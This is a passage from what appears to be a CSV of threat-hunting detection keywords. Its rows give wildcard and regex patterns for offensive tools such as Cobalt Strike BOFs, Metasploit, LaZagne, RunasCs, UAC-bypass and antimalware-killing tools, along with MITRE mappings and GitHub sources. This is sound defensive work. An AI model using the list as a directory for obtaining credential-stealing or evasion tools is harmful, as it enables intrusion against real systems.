Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*antonioCoco/RunasCs*",".{0,1000}antonioCoco\/RunasCs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*antonioCoco/SspiUacBypass*",".{0,1000}antonioCoco\/SspiUacBypass.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*anypotato.exe*",".{0,1000}anypotato\.exe.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege 
escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*aodkkagnadcbobfpggfnjeongemjbjca*",".{0,1000}aodkkagnadcbobfpggfnjeongemjbjca.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*AoratosWin*.zip*",".{0,1000}AoratosWin.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*AoratosWin.csproj*",".{0,1000}AoratosWin\.csproj.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*AoratosWin.exe*",".{0,1000}AoratosWin\.exe.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*AoratosWin.git*",".{0,1000}AoratosWin\.git.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*AoratosWin.sln*",".{0,1000}AoratosWin\.sln.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*AoratosWin_*.zip*",".{0,1000}AoratosWin_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*apache_felix_remote_shell*",".{0,1000}apache_felix_remote_shell.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*APC_Ijnect_Load.nim*",".{0,1000}APC_Ijnect_Load\.nim.{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","594","111","2023-12-28T15:23:19Z","2021-01-19T15:57:01Z" "*apex2john.py*",".{0,1000}apex2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*apfs_encrypted_volume_passwd.md*",".{0,1000}apfs_encrypted_volume_passwd\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*APIHookInjectorBin.exe*",".{0,1000}APIHookInjectorBin\.exe.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*APIHookInjectorBin.log*",".{0,1000}APIHookInjectorBin\.log.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*APIHookInjectorBin.pdb*",".{0,1000}APIHookInjectorBin\.pdb.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - 
T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*APIHookInjectorBin.sln*",".{0,1000}APIHookInjectorBin\.sln.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*apokryptein/secinject*",".{0,1000}apokryptein\/secinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","84","22","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" 
"*apop2john.py*",".{0,1000}apop2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*app.config['graph_spy_db_folder']*",".{0,1000}app\.config\[\'graph_spy_db_folder\'\].{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","0","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*app.config['graph_spy_db_path']*",".{0,1000}app\.config\[\'graph_spy_db_path\'\].{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","0","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*app.pentest-tools.com*",".{0,1000}app\.pentest\-tools\.com.{0,1000}","offensive_tool_keyword","pentest-tools.com","site often consulted by pentester","T1596 - T1592","TA0043","N/A","N/A","Reconnaissance","https://pentest-tools.com","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*app/dllproxy.nim*",".{0,1000}app\/dllproxy\.nim.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","9","2","157","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z" "*app/dllproxy.nim*",".{0,1000}app\/dllproxy\.nim.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "*appdata*\Windows:svchost.exe*",".{0,1000}appdata.{0,1000}\\Windows\:svchost\.exe.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*appdata*\Windows:winrm.vbs*",".{0,1000}appdata.{0,1000}\\Windows\:winrm\.vbs.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*AppData\Roaming\(s)AINT*",".{0,1000}AppData\\Roaming\\\(s\)AINT.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*apple_ios/aarch64/meterpreter_reverse_tcp*",".{0,1000}apple_ios\/aarch64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*applenotes2john.py*",".{0,1000}applenotes2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Applet_ReverseTCP.jar*",".{0,1000}Applet_ReverseTCP\.jar.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*Application.Lazagne.H*",".{0,1000}Application\.Lazagne\.H.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*AppLocker Bypass PowerShell Runspace.csproj*",".{0,1000}AppLocker\sBypass\sPowerShell\sRunspace\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*applocker_enum*",".{0,1000}applocker_enum.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","247","48","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*applocker-enumerator*",".{0,1000}applocker\-enumerator.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","247","48","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*apt install *tor2web*",".{0,1000}apt\sinstall\s.{0,1000}tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*apt install crunch*",".{0,1000}apt\sinstall\scrunch.{0,1000}","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*apt install dns2tcp*",".{0,1000}apt\sinstall\sdns2tcp.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*apt install gpp-decrypt*",".{0,1000}apt\sinstall\sgpp\-decrypt.{0,1000}","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*apt install hyperion*",".{0,1000}apt\sinstall\shyperion.{0,1000}","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. 
The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*apt install polenum*",".{0,1000}apt\sinstall\spolenum.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*apt install seclists*",".{0,1000}apt\sinstall\sseclists.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*apt install set -y*",".{0,1000}apt\sinstall\sset\s\-y.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","10238","2645","2023-12-21T20:10:33Z","2012-12-31T22:01:33Z" "*apt install tor *",".{0,1000}apt\sinstall\stor\s.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*apt install wce*",".{0,1000}apt\sinstall\swce.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A" "*APT stands for Advanced Persistence Tomato*",".{0,1000}APT\sstands\sfor\sAdvanced\sPersistence\sTomato.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*apt* install john*",".{0,1000}apt.{0,1000}\sinstall\sjohn.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*apt/etumbot.py*",".{0,1000}apt\/etumbot\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" 
"*apt/putterpanda.py*",".{0,1000}apt\/putterpanda\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*apt1_virtuallythere.profile*",".{0,1000}apt1_virtuallythere\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" 
"*APT64/EternalHushFramework*",".{0,1000}APT64\/EternalHushFramework.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*apt-get install *tor2web*",".{0,1000}apt\-get\sinstall\s.{0,1000}tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*apt-get install isc-dhcp-server net-tools*",".{0,1000}apt\-get\sinstall\sisc\-dhcp\-server\snet\-tools.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "*apt-get -y install tor *",".{0,1000}apt\-get\s\-y\sinstall\stor\s.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2856","292","2024-03-24T09:16:18Z","2019-03-28T18:07:05Z" "*APTortellini/unDefender*",".{0,1000}APTortellini\/unDefender.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - 
T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","321","77","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "*APTSimulator*",".{0,1000}APTSimulator.{0,1000}","offensive_tool_keyword","APTSimulator","APT Simulator is a Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised. In contrast to other adversary simulation tools. APT Simulator is designed to make the application as simple as possible. You don't need to run a web server. database or any agents on set of virtual machines. Just download the prepared archive. extract and run the contained Batch file as Administrator. Running APT Simulator takes less than a minute of your time.","T1036 - T1059 - T1562 - T1027 - T1003","TA0001 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/NextronSystems/APTSimulator","1","1","N/A","N/A","10","2374","414","2023-06-16T08:48:25Z","2018-02-03T14:19:42Z" "*apypykatz.py*",".{0,1000}apypykatz\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" 